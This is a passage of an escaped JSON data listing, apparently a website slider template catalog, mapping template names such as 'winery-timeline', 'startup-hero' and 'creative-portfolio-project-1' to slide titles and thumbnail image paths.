1\",\"img\":\"bg-effect-hero\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"bg-effect-hero\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"bg-effect-hero\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"bg-effect-hero\\/slide4.jpg\"}],\"cyberfunk\":[{\"title\":\"Slide 1\",\"img\":\"cyberfunk\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"cyberfunk\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"cyberfunk\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"cyberfunk\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"cyberfunk\\/slide5.jpg\"}],\"motion-blur-portfolio\":[{\"title\":\"Slide 1\",\"img\":\"motion-blur-portfolio\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"motion-blur-portfolio\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"motion-blur-portfolio\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"motion-blur-portfolio\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"motion-blur-portfolio\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"motion-blur-portfolio\\/slide6.jpg\"},{\"title\":\"Slide 7\",\"img\":\"motion-blur-portfolio\\/slide7.jpg\"},{\"title\":\"Slide 8\",\"img\":\"motion-blur-portfolio\\/slide8.jpg\"}],\"portal-effect-hero\":[{\"title\":\"Slide 1\",\"img\":\"portal-effect-hero\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"portal-effect-hero\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"portal-effect-hero\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"portal-effect-hero\\/slide4.jpg\"}],\"winery-timeline\":[{\"title\":\"Slide 1\",\"img\":\"winery-timeline\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"winery-timeline\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"winery-timeline\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"winery-timeline\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"winery-timeline\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"winery-timeline\\/slide6.jpg\"},{\"title\":\"Slide 7\",\"img\":\"winery-timeline\\/slide7.jpg\"}],\"smart-living-one-pager-v1\":[{\"title\":\"Slide 1\",\"img\":\"packages\\/Smart-Living-One-Pager-V1.jpg\"}],\"smart-living-one-pager-v2\":[{\"title\":\"Slide 1\",\"img\":\"packages\\/Smart-Living-One-Pager-V2.jpg\"}],\"smart-living-one-pager-v3\":[{\"title\":\"Slide 1\",\"img\":\"packages\\/Smart-Living-One-Pager-V3.jpg\"}],\"menu-1\":[{\"title\":\"Slide 1\",\"img\":\"menu-1\\/slide1.jpg\"}],\"onepage-hero-1\":[{\"title\":\"Slide 1\",\"img\":\"onepage-hero-1\\/slide1.jpg\"}],\"about1\":[{\"title\":\"Slide 1\",\"img\":\"about1\\/slide1.jpg\"}],\"services1\":[{\"title\":\"Slide 1\",\"img\":\"services1\\/slide1.jpg\"}],\"projects1\":[{\"title\":\"Slide 1\",\"img\":\"projects1\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"projects1\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"projects1\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"projects1\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"projects1\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"projects1\\/slide6.jpg\"}],\"footer-1\":[{\"title\":\"Slide 1\",\"img\":\"footer-1\\/slide1.jpg\"}],\"explainer-block-1-part1\":[{\"title\":\"Slide 1\",\"img\":\"explainer-block-1-part1\\/slide1.jpg\"}],\"explainer-block-1-part2\":[{\"title\":\"Slide 1\",\"img\":\"explainer-block-1-part2\\/slide1.jpg\"}],\"projects-modal-1\":[{\"title\":\"Slide 1\",\"img\":\"projects-modal-1\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"projects-modal-1\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"projects-modal-1\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"projects-modal-1\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"projects-modal-1\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"projects-modal-1\\/slide6.jpg\"}],\"menu-2\":[{\"title\":\"Slide 1\",\"img\":\"menu-2\\/slide1.jpg\"}],\"hero-2\":[{\"title\":\"Slide 1\",\"img\":\"hero-2\\/slide1.jpg\"}],\"services-2\":[{\"title\":\"Slide 1\",\"img\":\"services-2\\/services2-thumbnail.jpg\"}],\"about-2\":[{\"title\":\"Slide 1\",\"img\":\"about-2\\/slide1.jpg\"}],\"projects-2\":[{\"title\":\"Slide 1\",\"img\":\"projects-2\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"projects-2\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"projects-2\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"projects-2\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"projects-2\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"projects-2\\/slide6.jpg\"}],\"footer2\":[{\"title\":\"Slide 1\",\"img\":\"footer2\\/slide1.jpg\"}],\"explainer-block-2-part1\":[{\"title\":\"Slide 1\",\"img\":\"explainer-block-2-part1\\/slide1.jpg\"}],\"explainer-block-2-part2\":[{\"title\":\"Slide 1\",\"img\":\"explainer-block-2-part2\\/slide1.jpg\"}],\"projects-modal-2\":[{\"title\":\"Slide 1\",\"img\":\"projects-modal-2\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"projects-modal-2\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"projects-modal-2\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"projects-modal-2\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"projects-modal-2\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"projects-modal-2\\/slide6.jpg\"}],\"menu-3\":[{\"title\":\"Slide 1\",\"img\":\"menu-3\\/slide1.jpg\"}],\"hero-3\":[{\"title\":\"Slide 1\",\"img\":\"hero-3\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"hero-3\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"hero-3\\/slide3.jpg\"}],\"about-3\":[{\"title\":\"Slide 1\",\"img\":\"about-3\\/slide1.jpg\"}],\"services-3\":[{\"title\":\"Slide 1\",\"img\":\"services-3\\/slide1.jpg\"}],\"projects-3\":[{\"title\":\"Slide 1\",\"img\":\"projects-3\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"projects-3\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"projects-3\\/slide3.jpg\"}],\"footer-3\":[{\"title\":\"Slide 1\",\"img\":\"footer-3\\/slide1.jpg\"}],\"explainer-block-3-part1\":[{\"title\":\"Slide 1\",\"img\":\"explainer-block-3-part1\\/slide1.jpg\"}],\"explainer-block-3-part2\":[{\"title\":\"Slide 1\",\"img\":\"explainer-block-3-part2\\/slide1.jpg\"}],\"projects-modal-3\":[{\"title\":\"Slide 1\",\"img\":\"projects-modal-3\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"projects-modal-3\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"projects-modal-3\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"projects-modal-3\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"projects-modal-3\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"projects-modal-3\\/slide6.jpg\"}],\"urban-street-skate-slider\":[{\"title\":\"Slide 1\",\"img\":\"urban-street-skate-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"urban-street-skate-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"urban-street-skate-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"urban-street-skate-slider\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"urban-street-skate-slider\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"urban-street-skate-slider\\/slide6.jpg\"},{\"title\":\"Slide 7\",\"img\":\"urban-street-skate-slider\\/slide7.jpg\"},{\"title\":\"Slide 8\",\"img\":\"urban-street-skate-slider\\/slide8.jpg\"},{\"title\":\"Slide 9\",\"img\":\"urban-street-skate-slider\\/slide9.jpg\"},{\"title\":\"Slide 10\",\"img\":\"urban-street-skate-slider\\/slide10.jpg\"},{\"title\":\"Slide 11\",\"img\":\"urban-street-skate-slider\\/slide11.jpg\"},{\"title\":\"Slide 12\",\"img\":\"urban-street-skate-slider\\/slide12.jpg\"}],\"yummy-burgers\":[{\"title\":\"Slide 1\",\"img\":\"yummy-burgers\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"yummy-burgers\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"yummy-burgers\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"yummy-burgers\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"yummy-burgers\\/slide5.jpg\"}],\"tattoo-event-website-template-package\":[{\"title\":\"Slide 1\",\"img\":\"packages\\/tattoo_event_website_package.jpg\"}],\"tattoo-event-hero-slider\":[{\"title\":\"Slide 1\",\"img\":\"tattoo-event-hero-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"tattoo-event-hero-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"tattoo-event-hero-slider\\/slide3.jpg\"}],\"tattoo-event-about\":[{\"title\":\"Slide 1\",\"img\":\"tattoo-event-about\\/slide1.jpg\"}],\"tattoo-event-artists\":[{\"title\":\"Slide 1\",\"img\":\"tattoo-event-artists\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"tattoo-event-artists\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"tattoo-event-artists\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"tattoo-event-artists\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"tattoo-event-artists\\/slide5.jpg\"}],\"tattoo-event-schedule\":[{\"title\":\"Slide 1\",\"img\":\"tattoo-event-schedule\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"tattoo-event-schedule\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"tattoo-event-schedule\\/slide3.jpg\"}],\"tattoo-event-news\":[{\"title\":\"Slide 1\",\"img\":\"tattoo-event-news\\/slide1.jpg\"}],\"tattoo-event-footer\":[{\"title\":\"Slide 1\",\"img\":\"tattoo-event-footer\\/slide1.jpg\"}],\"startup-website-template\":[{\"title\":\"Slide 1\",\"img\":\"packages\\/startup-website-template.jpg\"}],\"startup-menu\":[{\"title\":\"Slide 1\",\"img\":\"startup-menu\\/slide1.jpg\"}],\"startup-hero\":[{\"title\":\"Slide 1\",\"img\":\"startup-hero\\/slide1.jpg\"}],\"startup-about\":[{\"title\":\"Slide 1\",\"img\":\"startup-about\\/slide1.jpg\"}],\"startup-features-1\":[{\"title\":\"Slide 1\",\"img\":\"startup-features-1\\/slide1.jpg\"}],\"startup-features-2\":[{\"title\":\"Slide 1\",\"img\":\"startup-features-2\\/slide1.jpg\"}],\"startup-team\":[{\"title\":\"Slide 1\",\"img\":\"startup-team\\/slide1.jpg\"}],\"startup-reviews\":[{\"title\":\"Slide 1\",\"img\":\"startup-reviews\\/slide1.jpg\"}],\"startup-cta\":[{\"title\":\"Slide 1\",\"img\":\"startup-cta\\/slide1.jpg\"}],\"startup-footer\":[{\"title\":\"Slide 1\",\"img\":\"startup-footer\\/slide1.jpg\"}],\"startup-video-modal\":[{\"title\":\"Slide 1\",\"img\":\"startup-video-modal\\/slide1.jpg\"}],\"christmas-gift-card-landing-page\":[{\"title\":\"Slide 1\",\"img\":\"packages\\/christmas-gift-card-landing-page.jpg\"}],\"christmas-landing-page-1\":[{\"title\":\"Slide 1\",\"img\":\"christmas-gift-card-landing-page\\/slide1.jpg\"}],\"christmas-landing-page-2\":[{\"title\":\"Slide 1\",\"img\":\"christmas-landing-page-2\\/slide1.jpg\"}],\"image-slider\":[{\"title\":\"Slide 1\",\"img\":\"image-slider\\/slide-1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"image-slider\\/slide-2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"image-slider\\/slide-3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"image-slider\\/slide-4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"image-slider\\/slide-5.jpg\"}],\"full-width-slider\":[{\"title\":\"Slide 1\",\"img\":\"full-width-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"full-width-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"full-width-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"full-width-slider\\/slide4.jpg\"}],\"app-website-template\":[{\"title\":\"Slide 1\",\"img\":\"packages\\/app-website-template.jpg\"}],\"app-website-menu\":[{\"title\":\"Slide 1\",\"img\":\"app-website-menu\\/slide1.jpg\"}],\"app-website-hero\":[{\"title\":\"Slide 1\",\"img\":\"app-website-hero\\/slide1.jpg\"}],\"app-download-buttons\":[{\"title\":\"Slide 1\",\"img\":\"app-download-buttons\\/slide1.jpg\"}],\"app-website-about\":[{\"title\":\"Slide 1\",\"img\":\"app-website-about\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"app-website-about\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"app-website-about\\/slide3.jpg\"}],\"app-website-features\":[{\"title\":\"Slide 1\",\"img\":\"app-website-features\\/slide1.jpg\"}],\"app-website-video-cta\":[{\"title\":\"Slide 1\",\"img\":\"app-website-video-cta\\/slide1.jpg\"}],\"app-website-screenshots\":[{\"title\":\"Slide 1\",\"img\":\"app-website-screenshots\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"app-website-screenshots\\/slide2.jpg\"}],\"app-testimonials-title\":[{\"title\":\"Slide 1\",\"img\":\"app-testimonials-title\\/slide1.jpg\"}],\"app-website-testimonials\":[{\"title\":\"Slide 1\",\"img\":\"app-website-testimonials\\/slide1.jpg\"}],\"app-website-team\":[{\"title\":\"Slide 1\",\"img\":\"app-website-team\\/slide1.jpg\"}],\"app-website-footer\":[{\"title\":\"Slide 1\",\"img\":\"app-website-footer\\/slide1.jpg\"}],\"app-video-modal\":[{\"title\":\"Slide 1\",\"img\":\"app-video-modal\\/slide1.jpg\"}],\"testimonial-carousel-pack\":[{\"title\":\"Slide 1\",\"img\":\"packages\\/testimonial-carousel-pack.jpg\"}],\"testimonial-carousel-1\":[{\"title\":\"Slide 1\",\"img\":\"testimonial-carousel-1\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"testimonial-carousel-1\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"testimonial-carousel-1\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"testimonial-carousel-1\\/slide4.jpg\"}],\"testimonial-carousel-2\":[{\"title\":\"Slide 1\",\"img\":\"testimonial-carousel-2\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"testimonial-carousel-2\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"testimonial-carousel-2\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"testimonial-carousel-2\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"testimonial-carousel-2\\/slide5.jpg\"}],\"testimonial-carousel-3\":[{\"title\":\"Slide 1\",\"img\":\"testimonial-carousel-3\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"testimonial-carousel-3\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"testimonial-carousel-3\\/slide3.jpg\"}],\"testimonial-carousel-4\":[{\"title\":\"Slide 1\",\"img\":\"testimonial-carousel-4\\/slide1.jpg\"}],\"testimonial-carousel-5\":[{\"title\":\"Slide 1\",\"img\":\"testimonial-carousel-5\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"testimonial-carousel-5\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"testimonial-carousel-5\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"testimonial-carousel-5\\/slide4.jpg\"}],\"deep-dive\":[{\"title\":\"Slide 1\",\"img\":\"deep-dive\\/slide1.jpg\"}],\"particle-wave-showcase\":[{\"title\":\"Slide 1\",\"img\":\"particle-wave-showcase\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"particle-wave-showcase\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"particle-wave-showcase\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"particle-wave-showcase\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"particle-wave-showcase\\/slide5.jpg\"}],\"video-hero-header\":[{\"title\":\"Slide 1\",\"img\":\"video-hero-header\\/slide1.jpg\"}],\"solar-system-showcase-slider\":[{\"title\":\"Slide 1\",\"img\":\"solar-system-showcase-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"solar-system-showcase-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"solar-system-showcase-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"solar-system-showcase-slider\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"solar-system-showcase-slider\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"solar-system-showcase-slider\\/slide6.jpg\"},{\"title\":\"Slide 7\",\"img\":\"solar-system-showcase-slider\\/slide7.jpg\"},{\"title\":\"Slide 8\",\"img\":\"solar-system-showcase-slider\\/slide8.jpg\"},{\"title\":\"Slide 9\",\"img\":\"solar-system-showcase-slider\\/slide9.jpg\"}],\"Optic-shop-showcase-slider\":[{\"title\":\"Slide 1\",\"img\":\"Optic-shop-showcase-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Optic-shop-showcase-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Optic-shop-showcase-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Optic-shop-showcase-slider\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"Optic-shop-showcase-slider\\/slide5.jpg\"}],\"charts-template-showcase\":[{\"title\":\"Slide 1\",\"img\":\"charts-template-showcase\\/slide1.jpg\"}],\"fashion-website-slider-template\":[{\"title\":\"Slide 1\",\"img\":\"packages\\/fashion-website-slider.jpg\"}],\"fashion-website-slider\":[{\"title\":\"Slide 1\",\"img\":\"fashion-website-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"fashion-website-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"fashion-website-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"fashion-website-slider\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"fashion-website-slider\\/slide5.jpg\"}],\"fashion-website-slider-modal\":[{\"title\":\"Slide 1\",\"img\":\"fashion-website-slider-modal\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"fashion-website-slider-modal\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"fashion-website-slider-modal\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"fashion-website-slider-modal\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"fashion-website-slider-modal\\/slide5.jpg\"}],\"furniture-website-slider\":[{\"title\":\"Slide 1\",\"img\":\"furniture-website-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"furniture-website-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"furniture-website-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"furniture-website-slider\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"furniture-website-slider\\/slide5.jpg\"}],\"fitness-gym-website-slider\":[{\"title\":\"Slide 1\",\"img\":\"fitness-gym-website-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"fitness-gym-website-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"fitness-gym-website-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"fitness-gym-website-slider\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"fitness-gym-website-slider\\/slide5.jpg\"}],\"ai--robotics-webside-slider-package\":[{\"title\":\"Slide 1\",\"img\":\"packages\\/ai-and-robotics-website-slider-package.jpg\"}],\"ai-and-robotics-website-slider\":[{\"title\":\"Slide 1\",\"img\":\"ai-and-robotics-website-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"ai-and-robotics-website-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"ai-and-robotics-website-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"ai-and-robotics-website-slider\\/slide4.jpg\"}],\"ai-video-modal\":[{\"title\":\"Slide 1\",\"img\":\"ai-video-modal\\/slide1.jpg\"}],\"minimal-typography-website-slider\":[{\"title\":\"Slide 1\",\"img\":\"minimal-typography-website-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"minimal-typography-website-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"minimal-typography-website-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"minimal-typography-website-slider\\/slide4.jpg\"}],\"404-page-collection\":[{\"title\":\"Slide 1\",\"img\":\"404-page-collection\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"404-page-collection\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"404-page-collection\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"404-page-collection\\/slide4.jpg\"}],\"ecommerce-sale-slider\":[{\"title\":\"Slide 1\",\"img\":\"ecommerce-sale-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"ecommerce-sale-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"ecommerce-sale-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"ecommerce-sale-slider\\/slide4.jpg\"}],\"fashion-shop-slider\":[{\"title\":\"Slide 1\",\"img\":\"fashion-shop-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"fashion-shop-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"fashion-shop-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"fashion-shop-slider\\/slide4.jpg\"}],\"lingerie-store-website-slider\":[{\"title\":\"Slide 1\",\"img\":\"lingerie-store-website-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"lingerie-store-website-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"lingerie-store-website-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"lingerie-store-website-slider\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"lingerie-store-website-slider\\/slide5.jpg\"}],\"beach-events-hero-collection\":[{\"title\":\"Slide 1\",\"img\":\"beach-events-hero-collection\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"beach-events-hero-collection\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"beach-events-hero-collection\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"beach-events-hero-collection\\/slide4.jpg\"}],\"creative-portfolio-website-slider-package\":[{\"title\":\"Slide 1\",\"img\":\"packages\\/creative-portfolio-website-slider-package.jpg\"}],\"creative-portfolio-main-slider\":[{\"title\":\"Slide 1\",\"img\":\"creative-portfolio-main-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"creative-portfolio-main-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"creative-portfolio-main-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"creative-portfolio-main-slider\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"creative-portfolio-main-slider\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"creative-portfolio-main-slider\\/slide6.jpg\"},{\"title\":\"Slide 7\",\"img\":\"creative-portfolio-main-slider\\/slide7.jpg\"},{\"title\":\"Slide 8\",\"img\":\"creative-portfolio-main-slider\\/slide8.jpg\"}],\"creative-portfolio-project-1\":[{\"title\":\"Slide 1\",\"img\":\"creative-portfolio-project-1\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"creative-portfolio-project-1\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"creative-portfolio-project-1\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"creative-portfolio-project-1\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"creative-portfolio-project-1\\/slide5.jpg\"}],\"creative-portfolio-project-2\":[{\"title\":\"Slide 1\",\"img\":\"creative-portfolio-project-2\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"creative-portfolio-project-2\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"creative-portfolio-project-2\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"creative-portfolio-project-2\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"creative-portfolio-project-2\\/slide5.jpg\"}],\"creative-portfolio-project-3\":[{\"title\":\"Slide 1\",\"img\":\"creative-portfolio-project-3\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"creative-portfolio-project-3\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"creative-portfolio-project-3\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"creative-portfolio-project-3\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"creative-portfolio-project-3\\/slide5.jpg\"}],\"creative-portfolio-project-4\":[{\"title\":\"Slide 1\",\"img\":\"creative-portfolio-project-4\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"creative-portfolio-project-4\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"creative-portfolio-project-4\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"creative-portfolio-project-4\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"creative-portfolio-project-4\\/slide5.jpg\"}],\"creative-portfolio-project-5\":[{\"title\":\"Slide 1\",\"img\":\"creative-portfolio-project-5\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"creative-portfolio-project-5\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"creative-portfolio-project-5\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"creative-portfolio-project-5\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"creative-portfolio-project-5\\/slide5.jpg\"}],\"creative-portfolio-project-6\":[{\"title\":\"Slide 1\",\"img\":\"creative-portfolio-project-6\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"creative-portfolio-project-6\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"creative-portfolio-project-6\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"creative-portfolio-project-6\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"creative-portfolio-project-6\\/slide5.jpg\"}],\"creative-portfolio-project-7\":[{\"title\":\"Slide 1\",\"img\":\"creative-portfolio-project-7\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"creative-portfolio-project-7\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"creative-portfolio-project-7\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"creative-portfolio-project-7\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"creative-portfolio-project-7\\/slide5.jpg\"}],\"ai-particle-cluster\":[{\"title\":\"Slide 1\",\"img\":\"ai-particle-cluster\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"ai-particle-cluster\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"ai-particle-cluster\\/slide3.jpg\"}],\"artistic-parallax-slider\":[{\"title\":\"Slide 1\",\"img\":\"artistic-parallax-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"artistic-parallax-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"artistic-parallax-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"artistic-parallax-slider\\/slide4.jpg\"}],\"magazine-content-slider\":[{\"title\":\"Slide 1\",\"img\":\"magazine-content-slider\\/slide1.jpg\"}],\"magazine-content-slider-static\":[{\"title\":\"Slide 1\",\"img\":\"magazine-content-slider-static\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"magazine-content-slider-static\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"magazine-content-slider-static\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"magazine-content-slider-static\\/slide4.jpg\"}],\"Masonry-Gallery-Carousel\":[{\"title\":\"Slide 1\",\"img\":\"Masonry-Gallery-Carousel\\/slide1.jpg\"},{\"title\":\"Slide 